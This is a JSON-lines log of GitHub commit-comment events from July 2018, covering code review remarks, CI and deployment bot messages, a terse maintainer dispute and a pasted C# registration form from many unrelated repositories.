{"id":"7909319837","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29573119,"position":null,"line":null,"path":null,"commit_id":"04f65d88799abed0d21169f02e1d83f8863e650a","created_at":"2018-07-02T22:49:16Z","updated_at":"2018-07-02T22:49:16Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-rolefx](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-rolefx).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-rolefx-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-02T22:49:16Z"}
{"id":"7909321043","type":"CommitCommentEvent","actor":{"login":"jordiascension"},"repo":{"name":"Sbolufer/FileServer"},"payload":{"comment":{"id":29573126,"position":null,"line":null,"path":null,"commit_id":"33f0578d2fecde987aa1c2699f65673a876f8171","created_at":"2018-07-02T22:49:39Z","updated_at":"2018-07-02T22:49:39Z","author_association":"COLLABORATOR","body":"Quan fas catch hauries de fer throw de la excepció.\r\nQuan tanques el StreamWriter hauríes de fer el dispose i no el close. Dimecres ho comentem"}},"created_at":"2018-07-02T22:49:39Z"}
{"id":"7909323093","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29573132,"position":103,"line":158,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/ReadyToRunCodegenNodeFactory.cs","commit_id":"35a49e8470528b9658ecc34150fcd70a379be3df","created_at":"2018-07-02T22:50:20Z","updated_at":"2018-07-02T22:50:20Z","author_association":"OWNER","body":"Obsolete comment, will fix (there's no thunk anymore)."}},"created_at":"2018-07-02T22:50:20Z"}
{"id":"7909326595","type":"CommitCommentEvent","actor":{"login":"gatewksbury"},"repo":{"name":"openrazer/openrazer"},"payload":{"comment":{"id":29573136,"position":null,"line":null,"path":null,"commit_id":"af84bd6c37b603662fc57f08efd55c71ee1c53a5","created_at":"2018-07-02T22:51:33Z","updated_at":"2018-07-02T22:51:33Z","author_association":"NONE","body":"Fixed #610.  No issues have been documented at this time."}},"created_at":"2018-07-02T22:51:33Z"}
{"id":"7909334303","type":"CommitCommentEvent","actor":{"login":"LucasNFerreira"},"repo":{"name":"LucasNFerreira/bountyhunterdatabase"},"payload":{"comment":{"id":29573152,"position":null,"line":null,"path":null,"commit_id":"1ba2ffd7d06df4d5fb69a54bf4c2f1e4230f9871","created_at":"2018-07-02T22:54:14Z","updated_at":"2018-07-02T22:54:14Z","author_association":"OWNER","body":"aproved"}},"created_at":"2018-07-02T22:54:14Z"}
{"id":"7909335973","type":"CommitCommentEvent","actor":{"login":"makmm"},"repo":{"name":"ProperVortex/eggcrackv2"},"payload":{"comment":{"id":29573154,"position":null,"line":null,"path":null,"commit_id":"96b1a3e33fba9ff21f52a8eed1d1d3570f6b83c0","created_at":"2018-07-02T22:54:49Z","updated_at":"2018-07-02T22:54:49Z","author_association":"NONE","body":"i mean me too thanks"}},"created_at":"2018-07-02T22:54:49Z"}
{"id":"7909344432","type":"CommitCommentEvent","actor":{"login":"simonhong"},"repo":{"name":"brave/brave-core"},"payload":{"comment":{"id":29573177,"position":null,"line":null,"path":null,"commit_id":"6c0e4c477082ca8bcfbb508f47aec474fdc56816","created_at":"2018-07-02T22:57:47Z","updated_at":"2018-07-02T22:57:47Z","author_association":"COLLABORATOR","body":"If `CHROME_CONFIG_HOME` is set, it can act as a parent directory of our directory.\r\nIf we don't want that option, this can be removed by overriding.\r\n"}},"created_at":"2018-07-02T22:57:47Z"}
{"id":"7909346957","type":"CommitCommentEvent","actor":{"login":"ryansavara"},"repo":{"name":"JKruse4/ZAU-Website"},"payload":{"comment":{"id":29573186,"position":null,"line":null,"path":null,"commit_id":"101a8690bb60061d4be57ecddb2ac28d5130f15a","created_at":"2018-07-02T22:58:39Z","updated_at":"2018-07-02T22:58:39Z","author_association":"COLLABORATOR","body":"@JKruse4 line 148, ztlartcc.org"}},"created_at":"2018-07-02T22:58:39Z"}
{"id":"7909348675","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/brave-core"},"payload":{"comment":{"id":29573190,"position":null,"line":null,"path":null,"commit_id":"6c0e4c477082ca8bcfbb508f47aec474fdc56816","created_at":"2018-07-02T22:59:14Z","updated_at":"2018-07-02T22:59:14Z","author_association":"COLLABORATOR","body":"Well, I think the problem is that someone may have it set for Chrome and then Brave will go in there as well. That may or may not be the user's intent so I think it's best to override here"}},"created_at":"2018-07-02T22:59:14Z"}
{"id":"7909349383","type":"CommitCommentEvent","actor":{"login":"ryansavara"},"repo":{"name":"JKruse4/ZAU-Website"},"payload":{"comment":{"id":29573192,"position":null,"line":null,"path":null,"commit_id":"6b32ea2b15e6e60defae9c9ce011775d9360703d","created_at":"2018-07-02T22:59:28Z","updated_at":"2018-07-02T22:59:28Z","author_association":"COLLABORATOR","body":"@JKruse4 Missed CHI_APP (C90), ORD_TWR. Ground and Del positions."}},"created_at":"2018-07-02T22:59:28Z"}
{"id":"7909350428","type":"CommitCommentEvent","actor":{"login":"ryansavara"},"repo":{"name":"JKruse4/ZAU-Website"},"payload":{"comment":{"id":29573195,"position":null,"line":null,"path":null,"commit_id":"68f6fded26d8f6e75e8d722018f307a637af2b2b","created_at":"2018-07-02T22:59:50Z","updated_at":"2018-07-02T22:59:50Z","author_association":"COLLABORATOR","body":"@JKruse4 Missed KORD"}},"created_at":"2018-07-02T22:59:50Z"}
{"id":"7909351348","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/brave-core"},"payload":{"comment":{"id":29573198,"position":null,"line":null,"path":null,"commit_id":"6c0e4c477082ca8bcfbb508f47aec474fdc56816","created_at":"2018-07-02T23:00:10Z","updated_at":"2018-07-02T23:00:10Z","author_association":"COLLABORATOR","body":"can we also merge the `OFFICIAL_BUILD` `-development` into `GetChannelSuffixForDataDir`? I can't see any reason to handle them separately"}},"created_at":"2018-07-02T23:00:10Z"}
{"id":"7909357739","type":"CommitCommentEvent","actor":{"login":"ryansavara"},"repo":{"name":"JKruse4/ZAU-Website"},"payload":{"comment":{"id":29573219,"position":null,"line":null,"path":null,"commit_id":"768327775d8c9ee27e852ff4ac831e03ffa02501","created_at":"2018-07-02T23:02:12Z","updated_at":"2018-07-02T23:02:12Z","author_association":"COLLABORATOR","body":"@JKruse4 162 wrong airports?"}},"created_at":"2018-07-02T23:02:12Z"}
{"id":"7909358455","type":"CommitCommentEvent","actor":{"login":"egartley"},"repo":{"name":"egartley/beyond-origins"},"payload":{"comment":{"id":29573222,"position":null,"line":null,"path":null,"commit_id":"d4ec3e8dbde5eb183c30c4c51fe3b2527f42de4a","created_at":"2018-07-02T23:02:26Z","updated_at":"2018-07-02T23:02:26Z","author_association":"OWNER","body":"What makes the magic happen https://github.com/egartley/beyond-origins/commit/d4ec3e8dbde5eb183c30c4c51fe3b2527f42de4a#diff-366aef79fa14d7c97ae614591cade146R106"}},"created_at":"2018-07-02T23:02:26Z"}
{"id":"7909358526","type":"CommitCommentEvent","actor":{"login":"simonhong"},"repo":{"name":"brave/brave-core"},"payload":{"comment":{"id":29573223,"position":null,"line":null,"path":null,"commit_id":"6c0e4c477082ca8bcfbb508f47aec474fdc56816","created_at":"2018-07-02T23:02:28Z","updated_at":"2018-07-02T23:02:28Z","author_association":"COLLABORATOR","body":"ok"}},"created_at":"2018-07-02T23:02:28Z"}
{"id":"7909359149","type":"CommitCommentEvent","actor":{"login":"samstav"},"repo":{"name":"adieuadieu/alagarr"},"payload":{"comment":{"id":29573227,"position":null,"line":null,"path":null,"commit_id":"d992287240606a614821de8117fe051ab7b07340","created_at":"2018-07-02T23:02:41Z","updated_at":"2018-07-02T23:02:41Z","author_association":"NONE","body":"FWIW your style, interface, implementation, and naming scheme is better so far... I'd say keep going."}},"created_at":"2018-07-02T23:02:41Z"}
{"id":"7909363635","type":"CommitCommentEvent","actor":{"login":"simonhong"},"repo":{"name":"brave/brave-core"},"payload":{"comment":{"id":29573234,"position":null,"line":null,"path":null,"commit_id":"6c0e4c477082ca8bcfbb508f47aec474fdc56816","created_at":"2018-07-02T23:04:15Z","updated_at":"2018-07-02T23:04:15Z","author_association":"COLLABORATOR","body":"> can we also merge the OFFICIAL_BUILD -Development into GetChannelSuffixForDataDir? I can't see any reason to handle them separately\r\n\r\nhttps://github.com/brave/brave-core/pull/205 cleaned up it. PTAL this issue, too."}},"created_at":"2018-07-02T23:04:15Z"}
{"id":"7909369663","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/brave-core"},"payload":{"comment":{"id":29573252,"position":null,"line":null,"path":null,"commit_id":"6c0e4c477082ca8bcfbb508f47aec474fdc56816","created_at":"2018-07-02T23:06:26Z","updated_at":"2018-07-02T23:06:26Z","author_association":"COLLABORATOR","body":"I see the official build change, but we're still patching instead of overriding the method in chromium_src"}},"created_at":"2018-07-02T23:06:26Z"}
{"id":"7909370900","type":"CommitCommentEvent","actor":{"login":"ryansavara"},"repo":{"name":"JKruse4/ZAU-Website"},"payload":{"comment":{"id":29573258,"position":null,"line":null,"path":null,"commit_id":"c5b5b53758759f64605c1c5c64057b26a196b75b","created_at":"2018-07-02T23:06:54Z","updated_at":"2018-07-02T23:06:54Z","author_association":"COLLABORATOR","body":"@JKruse4 line 9 I think \"America/New_York\" is timezone, which \"America/Chicago\" would be the correct one"}},"created_at":"2018-07-02T23:06:54Z"}
{"id":"7909377630","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29573273,"position":null,"line":null,"path":null,"commit_id":"3bb9c5da466bfe761b525be470550afcd960faa8","created_at":"2018-07-02T23:09:23Z","updated_at":"2018-07-02T23:09:23Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-serch](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-serch).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-serch-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-02T23:09:23Z"}
{"id":"7909380276","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29573279,"position":47,"line":35,"path":"contracts/Splitter.sol","commit_id":"c4949ebf1726bec392800646f352dd4c8b36e417","created_at":"2018-07-02T23:10:19Z","updated_at":"2018-07-02T23:10:19Z","author_association":"OWNER","body":"I started using this variable based on below comment from Rob: \r\nFirst the trivial matter. You are paying gas to keep accessing msg.value and divide by 2. I think it would be better to do it once and store in a memory variable, e.g. uint half = msg.value/2.\r\n\r\nPlease advise what is the better way to do "}},"created_at":"2018-07-02T23:10:19Z"}
{"id":"7909387562","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyemma_tutorials-feedstock"},"payload":{"comment":{"id":29573301,"position":null,"line":null,"path":null,"commit_id":"4ff2000a497933160cff91ae9a8370ef2833b382","created_at":"2018-07-02T23:12:55Z","updated_at":"2018-07-02T23:12:55Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @cwehmeyer, @marscher were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T23:12:55Z"}
{"id":"7909389462","type":"CommitCommentEvent","actor":{"login":"ralvarador"},"repo":{"name":"riderkick/FMD"},"payload":{"comment":{"id":29573307,"position":null,"line":null,"path":null,"commit_id":"cfdfa66e8e2c441fb26bf875fdaf141bf01d6b80","created_at":"2018-07-02T23:13:34Z","updated_at":"2018-07-02T23:13:34Z","author_association":"NONE","body":"Thanks for the fixes in this new build/release"}},"created_at":"2018-07-02T23:13:34Z"}
{"id":"7909391708","type":"CommitCommentEvent","actor":{"login":"mdyang"},"repo":{"name":"ruiyangio/search-extension"},"payload":{"comment":{"id":29573312,"position":6,"line":23,"path":"extension/background.js","commit_id":"4c1d3787198faa5cab031ada6150a05bedb59f68","created_at":"2018-07-02T23:14:21Z","updated_at":"2018-07-02T23:14:21Z","author_association":"NONE","body":"test"}},"created_at":"2018-07-02T23:14:21Z"}
{"id":"7909410265","type":"CommitCommentEvent","actor":{"login":"kh-kim"},"repo":{"name":"kh-kim/simple-nmt"},"payload":{"comment":{"id":29573363,"position":null,"line":null,"path":null,"commit_id":"c5709ba58aa9e9b1ee78c07cf69072239948dbdf","created_at":"2018-07-02T23:20:59Z","updated_at":"2018-07-02T23:20:59Z","author_association":"OWNER","body":"This version can be used for Lecture of basic seq2seq with beam search."}},"created_at":"2018-07-02T23:20:59Z"}
{"id":"7909411378","type":"CommitCommentEvent","actor":{"login":"adikos01"},"repo":{"name":"Kiwiutek/Oxygen-Not-Included-Spolszczenie"},"payload":{"comment":{"id":29573365,"position":null,"line":null,"path":null,"commit_id":"03fda3937336cabcc74da0534e6eda9d9d2e21fa","created_at":"2018-07-02T23:21:21Z","updated_at":"2018-07-02T23:21:21Z","author_association":"NONE","body":"Jak to zrobić ;v?"}},"created_at":"2018-07-02T23:21:21Z"}
{"id":"7909414841","type":"CommitCommentEvent","actor":{"login":"drzraf"},"repo":{"name":"cpvrlab/ImagePlay"},"payload":{"comment":{"id":29573374,"position":9,"line":422,"path":"ImagePlay/src/MainWindow.cpp","commit_id":"a630e431a33fa036007011f91236cba3f0bc7f81","created_at":"2018-07-02T23:22:40Z","updated_at":"2018-07-02T23:22:40Z","author_association":"NONE","body":"why :) ?"}},"created_at":"2018-07-02T23:22:40Z"}
{"id":"7909418395","type":"CommitCommentEvent","actor":{"login":"vecchiotom"},"repo":{"name":"IllusiveTea/WebSocket_AdminPanel"},"payload":{"comment":{"id":29573386,"position":null,"line":null,"path":null,"commit_id":"4eae6e0225baf044001f9c674d6ad2aa4a8ba898","created_at":"2018-07-02T23:23:59Z","updated_at":"2018-07-02T23:23:59Z","author_association":"NONE","body":"?"}},"created_at":"2018-07-02T23:23:59Z"}
{"id":"7909430700","type":"CommitCommentEvent","actor":{"login":"marcosvlehmkuhl"},"repo":{"name":"AlyoshaS/tchat"},"payload":{"comment":{"id":29573416,"position":4,"line":99,"path":"drupal/modules/custom/taller_chat_user/src/Plugin/GraphQL/Mutations/UserRegister.php","commit_id":"ebfff0196d5eb8b0f5a6ed801e8100988a58a109","created_at":"2018-07-02T23:28:33Z","updated_at":"2018-07-02T23:28:33Z","author_association":"NONE","body":"I do not believe this would redirect the user from the register/login page to `/messages/general`, but will only not throw an exception if the user is already logged on and allow the user to register another user while logged on."}},"created_at":"2018-07-02T23:28:33Z"}
{"id":"7909433741","type":"CommitCommentEvent","actor":{"login":"jyasskin"},"repo":{"name":"cbor-wg/cddl"},"payload":{"comment":{"id":29573422,"position":25,"line":373,"path":"draft-ietf-cbor-cddl.md","commit_id":"6dce3fab589dedb4116e14b8582c1829dbed90a2","created_at":"2018-07-02T23:29:38Z","updated_at":"2018-07-02T23:29:38Z","author_association":"NONE","body":"s/Numbers/numbers/?"}},"created_at":"2018-07-02T23:29:38Z"}
{"id":"7909438599","type":"CommitCommentEvent","actor":{"login":"JeanPaulLucien"},"repo":{"name":"JeanPaulLucien/saliengame_idler"},"payload":{"comment":{"id":29573432,"position":null,"line":null,"path":null,"commit_id":"5f7c58780f6d511b3723f435d5d8bc6ef2467b2d","created_at":"2018-07-02T23:31:14Z","updated_at":"2018-07-02T23:31:14Z","author_association":"OWNER","body":"Was fixed https://github.com/ensingm2/saliengame_idler/issues/84"}},"created_at":"2018-07-02T23:31:14Z"}
{"id":"7909440355","type":"CommitCommentEvent","actor":{"login":"KUMARR74"},"repo":{"name":"KUMARR74/sample-cloud-native-toolchain-tutorial-20180625195756275"},"payload":{"comment":{"id":29573436,"position":null,"line":null,"path":null,"commit_id":"945c62e20fc5ca5b535eea0a3b1fb812b6e50239","created_at":"2018-07-02T23:31:51Z","updated_at":"2018-07-02T23:31:51Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/80924053-db03-4b9c-8909-e65a97f243d0?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180625195756275\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/970b7a54-ccb6-4c67-8948-371e37d92bdd?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180625195756275\") deployed [sample-cloud-native-toolchain-tutorial-20180625195756275](https://github.com/KUMARR74/sample-cloud-native-toolchain-tutorial-20180625195756275/releases/tag/deploy-ibm-yp-us-south-kumar.raman-ibm.com-prod-20180702-233151 \"deploy-ibm-yp-us-south-kumar.raman-ibm.com-prod-20180702-233151\") to [prod](https://console.bluemix.net/apps/17f3b29c-f4c4-4736-858a-5ab1c9a358a1?env_id=ibm:yp:us-south \"ibm:yp:us-south:kumar.raman@ibm.com:prod\"), including this commit"}},"created_at":"2018-07-02T23:31:51Z"}
{"id":"7909444381","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"luserx0/src"},"payload":{"comment":{"id":29573446,"position":21,"line":38,"path":"sys/kern/kern_ubsan.c","commit_id":"ccfa3f4b2e4ad40b2712fed54f03e6cf7c035947","created_at":"2018-07-02T23:33:20Z","updated_at":"2018-07-02T23:33:20Z","author_association":"COLLABORATOR","body":"I propose to finish for the evaluation: sorting all problems detected with kubsan during boot and during execution of ATF tests."}},"created_at":"2018-07-02T23:33:20Z"}
{"id":"7909444737","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"luserx0/src"},"payload":{"comment":{"id":29573448,"position":9,"line":26,"path":"sys/kern/kern_ubsan.c","commit_id":"ccfa3f4b2e4ad40b2712fed54f03e6cf7c035947","created_at":"2018-07-02T23:33:27Z","updated_at":"2018-07-02T23:33:27Z","author_association":"COLLABORATOR","body":"DONE"}},"created_at":"2018-07-02T23:33:27Z"}
{"id":"7909445183","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"luserx0/src"},"payload":{"comment":{"id":29573451,"position":10,"line":27,"path":"sys/kern/kern_ubsan.c","commit_id":"ccfa3f4b2e4ad40b2712fed54f03e6cf7c035947","created_at":"2018-07-02T23:33:36Z","updated_at":"2018-07-02T23:33:36Z","author_association":"COLLABORATOR","body":"Not needed. DONE"}},"created_at":"2018-07-02T23:33:36Z"}
{"id":"7909446165","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"luserx0/src"},"payload":{"comment":{"id":29573453,"position":15,"line":32,"path":"sys/kern/kern_ubsan.c","commit_id":"ccfa3f4b2e4ad40b2712fed54f03e6cf7c035947","created_at":"2018-07-02T23:33:57Z","updated_at":"2018-07-02T23:33:57Z","author_association":"COLLABORATOR","body":"In progress, please move this on top."}},"created_at":"2018-07-02T23:33:57Z"}
{"id":"7909446362","type":"CommitCommentEvent","actor":{"login":"cabo"},"repo":{"name":"cbor-wg/cddl"},"payload":{"comment":{"id":29573454,"position":25,"line":373,"path":"draft-ietf-cbor-cddl.md","commit_id":"6dce3fab589dedb4116e14b8582c1829dbed90a2","created_at":"2018-07-02T23:34:02Z","updated_at":"2018-07-02T23:34:02Z","author_association":"CONTRIBUTOR","body":"To be fixed in -04..."}},"created_at":"2018-07-02T23:34:02Z"}
{"id":"7909449649","type":"CommitCommentEvent","actor":{"login":"EisenbergEffect"},"repo":{"name":"aurelia/templating-router"},"payload":{"comment":{"id":29573465,"position":null,"line":null,"path":null,"commit_id":"38f9dc4dc7c4af60b21bf7d1e5b40f7f4e10433d","created_at":"2018-07-02T23:35:13Z","updated_at":"2018-07-02T23:35:13Z","author_association":"MEMBER","body":"@davismj Is this library safe to release from master? I had the impression there might be some issues. If it's good to go, I'd like to get it out today."}},"created_at":"2018-07-02T23:35:13Z"}
{"id":"7909455980","type":"CommitCommentEvent","actor":{"login":"ynFatal"},"repo":{"name":"ynFatal/test"},"payload":{"comment":{"id":29573478,"position":null,"line":null,"path":null,"commit_id":"c547479bc5d7f4dbf618e13e2716cb3896e812c6","created_at":"2018-07-02T23:37:37Z","updated_at":"2018-07-02T23:37:37Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-02T23:37:37Z"}
{"id":"7909457554","type":"CommitCommentEvent","actor":{"login":"deanishe"},"repo":{"name":"deanishe/awgo"},"payload":{"comment":{"id":29573481,"position":39,"line":58,"path":"README.md","commit_id":"5f0051950af39371385f2dfda96483eb1423e565","created_at":"2018-07-02T23:38:12Z","updated_at":"2018-07-02T23:38:12Z","author_association":"OWNER","body":"> If you insist on this setup being the one required to do shell development\r\n\r\nIt's not required. As I clearly stated, that's just the way *I* write workflows. Literally all that's required is that three environment variables are set:\r\n\r\n- `alfred_workflow_bundleid`\r\n- `alfred_workflow_cache`\r\n- `alfred_workflow_data`\r\n\r\n> you are exacting a cost on developers to have to use an elaborate setup \r\n\r\nWhat exactly is \"elaborate\" about setting three poxy environment variables?\r\n\r\n> I really prefer to be able to develop Go programs easily with the terminal and a code editor without third-party plug-ins, setup files, and symlinks.\r\n\r\nNone of which is required.\r\n\r\n> If you insist on this setup being the one required to do shell development, I recommend making an example tutorial\r\n\r\nAgain, I do not insist on that setup, and the requirements—such as they are—are [explicitly listed in the documentation of `aw.New()`](https://godoc.org/github.com/deanishe/awgo#New).\r\n\r\nI spent several hours rewriting the library to accommodate your requests, and another 30 minutes on that last post trying to explain my motivations and reasoning.\r\n\r\nNot only did you not pay me for that (which was not expected), but by all appearances you haven't even bothered to read my comment, the updated docs or the diffs, which would be common courtesy, imo.\r\n\r\nYou're coming across as lazy and entitled (setting three environment variables is \"exacting a cost on developers\"? My arse is it). So at this point, as I'm sure you'll understand, I am extremely disinclined to make any further changes to the library on your account.\r\n\r\nIf setting three environmental variables is too much work for you, submit a PR with a fix or fork the library.\r\n\r\nOtherwise, we're done here."}},"created_at":"2018-07-02T23:38:12Z"}
{"id":"7909457885","type":"CommitCommentEvent","actor":{"login":"zhenchengcode"},"repo":{"name":"zhenchengcode/angular-app-template"},"payload":{"comment":{"id":29573484,"position":null,"line":null,"path":null,"commit_id":"e9ecd886f16f286178f396547439a117b902421b","created_at":"2018-07-02T23:38:20Z","updated_at":"2018-07-02T23:38:20Z","author_association":"OWNER","body":"refer to the displayToken.token_picker_id using {{}} solve the problem of not selecting "}},"created_at":"2018-07-02T23:38:20Z"}
{"id":"7909459801","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29573485,"position":null,"line":null,"path":null,"commit_id":"8969ce6f966d2053e3baa65a20e4ee7090efe760","created_at":"2018-07-02T23:39:03Z","updated_at":"2018-07-02T23:39:03Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2308 of 2309 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-02T23:39:03Z"}
{"id":"7909462299","type":"CommitCommentEvent","actor":{"login":"madhurichowdari"},"repo":{"name":"madhurichowdari/lms"},"payload":{"comment":{"id":29573493,"position":null,"line":null,"path":null,"commit_id":"f155a90cf566ea591a409702a566d3dac6f8c545","created_at":"2018-07-02T23:39:57Z","updated_at":"2018-07-02T23:39:57Z","author_association":"OWNER","body":"using System;\r\nusing System.Data.SqlClient;\r\nusing System.Configuration;\r\nusing System.ComponentModel;\r\nnamespace leave_management_sysytem\r\n{\r\n    public partial class userreg : System.Web.UI.Page\r\n    {\r\n        SqlCommand cmd = new SqlCommand();\r\n        SqlConnection con = new SqlConnection();\r\n\r\n        protected void Page_Load(object sender, EventArgs e)\r\n        {\r\n\r\n            SqlConnection con = new SqlConnection(\"Data Source = DESKTOP - TEBPRHU; Initial Catalog = leave.dbo; Integrated Security = True\");\r\n            con.Open();\r\n        }\r\n\r\n        protected void Button1_Click(object sender, EventArgs e)\r\n        {\r\n            SqlCommand cmd = new SqlCommand(\"Insert into userreg\"+ \"(username,password,reenter password,email id,mobile number)values(@username, @password, @reenter password, @email id, @mobile number)\");\r\n            cmd.Parameters.AddWithValue(\"@username\",TextBox1.Text);\r\n            cmd.Parameters.AddWithValue(\"@password\",TextBox2.Text);\r\n            cmd.Parameters.AddWithValue(\"@reenter password\",TextBox3.Text);\r\n            cmd.Parameters.AddWithValue(\"@email id\",TextBox4.Text);\r\n            cmd.Parameters.AddWithValue(\"@mobile number\",TextBox5.Text);\r\n            cmd.ExecuteNonQuery();\r\n            Label6.Text = \"Registered successfully\";\r\n\r\n\r\n        }\r\n    }\r\n}\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-02T23:39:57Z"}
{"id":"7909463909","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29573504,"position":null,"line":null,"path":null,"commit_id":"8969ce6f966d2053e3baa65a20e4ee7090efe760","created_at":"2018-07-02T23:40:30Z","updated_at":"2018-07-02T23:40:30Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-02T23:40:30Z"}
{"id":"7909468142","type":"CommitCommentEvent","actor":{"login":"ssechoss"},"repo":{"name":"ssechoss/the-more-the-better"},"payload":{"comment":{"id":29573513,"position":null,"line":null,"path":null,"commit_id":"ac1b4636b52f20bb4c675de16528fb6fd8d900e2","created_at":"2018-07-02T23:42:04Z","updated_at":"2018-07-02T23:42:04Z","author_association":"OWNER","body":"Description\r\nGiven two strings s and t, determine if they are isomorphic.\r\n\r\nTwo strings are isomorphic if the characters in s can be replaced to get t.\r\n\r\nAll occurrences of a character must be replaced with another character while preserving the order of characters. No two characters may map to the same character but a character may map to itself."}},"created_at":"2018-07-02T23:42:04Z"}
{"id":"7909470544","type":"CommitCommentEvent","actor":{"login":"NTillmann"},"repo":{"name":"hotsnr/prepack"},"payload":{"comment":{"id":29573518,"position":42,"line":149,"path":"src/serializer/functions.js","commit_id":"70d85e9257ab19b814eec0f43b0b338168499a61","created_at":"2018-07-02T23:42:56Z","updated_at":"2018-07-02T23:42:56Z","author_association":"NONE","body":"`?StringValue` allows for both `null` and `undefined`, leaving it unclear if there's a subtle semantic difference between the two.\r\n\r\nWe tend to avoid that.\r\n\r\nPrefer `argModelString?: StringValue`, where `argModelString` can be `undefined`, but not `null`."}},"created_at":"2018-07-02T23:42:56Z"}
{"id":"7909472704","type":"CommitCommentEvent","actor":{"login":"NTillmann"},"repo":{"name":"hotsnr/prepack"},"payload":{"comment":{"id":29573524,"position":99,"line":262,"path":"src/serializer/functions.js","commit_id":"70d85e9257ab19b814eec0f43b0b338168499a61","created_at":"2018-07-02T23:43:41Z","updated_at":"2018-07-02T23:43:41Z","author_association":"NONE","body":"Maybe a TODO, but no need to actually deal with that now."}},"created_at":"2018-07-02T23:43:41Z"}
{"id":"7909473351","type":"CommitCommentEvent","actor":{"login":"lauraachon"},"repo":{"name":"lauraachon/futoshiki-prolog"},"payload":{"comment":{"id":29573525,"position":5,"line":19,"path":"acertijo1.pl","commit_id":"c4c247115f2b895fce4c427c53d24f3ffbc1d40f","created_at":"2018-07-02T23:43:54Z","updated_at":"2018-07-02T23:43:54Z","author_association":"OWNER","body":"se me escapo algo raro ahi"}},"created_at":"2018-07-02T23:43:54Z"}
{"id":"7909474852","type":"CommitCommentEvent","actor":{"login":"NTillmann"},"repo":{"name":"hotsnr/prepack"},"payload":{"comment":{"id":29573530,"position":18,"line":18,"path":"src/utils/ShapeInformation.js","commit_id":"70d85e9257ab19b814eec0f43b0b338168499a61","created_at":"2018-07-02T23:44:29Z","updated_at":"2018-07-02T23:44:29Z","author_association":"NONE","body":"If only a finite set of types is allowed, use an enumeration type, e.g. \"A\" | \"B\" | \"C\"."}},"created_at":"2018-07-02T23:44:29Z"}
